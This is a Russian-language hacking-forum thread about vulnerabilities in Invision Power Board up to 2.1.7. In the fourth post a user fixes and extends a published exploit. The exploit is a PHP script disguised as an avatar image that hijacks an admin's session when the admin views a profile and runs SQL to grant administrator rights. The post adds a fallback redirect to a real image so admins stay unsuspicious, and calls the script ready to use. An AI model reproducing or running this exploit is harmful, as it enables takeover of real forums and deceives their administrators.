HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу sql-inj в ipb <=2.1.7
   
Закрытая тема
Страница 5 из 5 < 1 2 3 4 5
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 08.11.2006, 01:36
}{0TT@БЬ)Ч
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
С нами: 10686686

Репутация: 447
По умолчанию
Баг заключается в недостаточной фильтрации переменной st в списке "кто онлайн"
С уязвимости в параметре st вроде тока можно поиметь раскрытие префикса БД.
𝕏 Twitter Reddit Telegram Копировать ссылку
Последний раз редактировалось }{0TT@БЬ)Ч; 08.11.2006 в 01:39..
 

  #2  
Старый 11.11.2006, 14:33
~Lexx~
Участник форума
Регистрация: 30.09.2006
Сообщений: 165
С нами: 10321822

Репутация: 57
По умолчанию
Люди помогите пожалуста... Какие еще сервы позволяют редактировать .htaccess?
а то с этими че та сплошные траблы
 

  #3  
Старый 11.11.2006, 15:44
_-[A.M.D]HiM@S-_
Green member
Регистрация: 28.12.2005
Сообщений: 376
С нами: 10719686

Репутация: 1833
По умолчанию
Цитата:
Сообщение от ~Lexx~  
Люди помогите пожалуста... Какие еще сервы позволяют редактировать .htaccess?
а то с этими че та сплошные траблы
Код:
http://www.creater.ru/index.php?tid=90&&a=dwnld&script_id=1030
------------------------------------------------------------------

Grey: тема закрыта, все сообщения не имеющие информационной ценности удалены, ссылка на тему добавлена в тему [Обзор уязвимостей Ipb].
Последний раз редактировалось Grey; 10.03.2007 в 18:55..
 

  #4  
Старый 10.10.2006, 18:50
BMaster
Познающий
Регистрация: 12.01.2006
Сообщений: 52
С нами: 10697574

Репутация: 140
По умолчанию
Разобрался я с этим експлойтом, прет кук из админпанели и добавляет к нему запрос сэквел, мне понравилось
У кого что то не получается расскажу что нужно сделать чтобы получилось
Как сделать чтобы скрыть под avatar.jpg пхп скрипт думаю ясно, но скопировав предоставленный эксплойт и даже подставив нужные значения, ничего не выйдет, там есть небольшая хитрость (может просто случайность) в строке:
Код:
  header("Location:  ".$admin_loc[1]."&act=sql&code=runsql&query=UPDATE+{$prefix}members+SET+mgroup%3D4+where+id%3D{$mid}+LIMIT+1");
Нужно удалить лишний знак табуляции и выровнять строку так:
l
Код:
header("Location: ".$admin_loc[1]."&act=sql&code=runsql&query=UPDATE+{$prefix}members+SET+mgroup%3D4+where+id%3D{$mid}+LIMIT+1");

Заодно предоставлю следующий вариант, чтобы у админов не вызывал подозрения не отображающийся аватар, допишем строчку в сплойт (сплойт готовый к употреблению):
Код:
<?php  
$mid = 2;   
if (preg_match('/(.*adsess=[\\w]{32})/',  $_SERVER['HTTP_REFERER'], $admin_loc) and $mid)  
{  header("Location: ".$admin_loc[1]."&act=sql&code=runsql&query=UPDATE+ibf_members+SET+posts%3D12897+WHERE+id%3D2");  }
else { header("Location: http://forum.xxx/forum/uploads/av-xx.jpg"); } 
?>
Тестировочный сплойт, который станавливает юзеру с id=2 количество постов 12897, чтобы получить права админа вставляем запрос из официального сплойта
Сработает только тогда, когда админ посмотрит профиль юзера из Админпанели
p.s Если админ посмотри профиль в браузере konqueror вас ждет разочарование
Последний раз редактировалось BMaster; 10.10.2006 в 22:38..
 
Закрытая тема
Страница 5 из 5 < 1 2 3 4 5



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.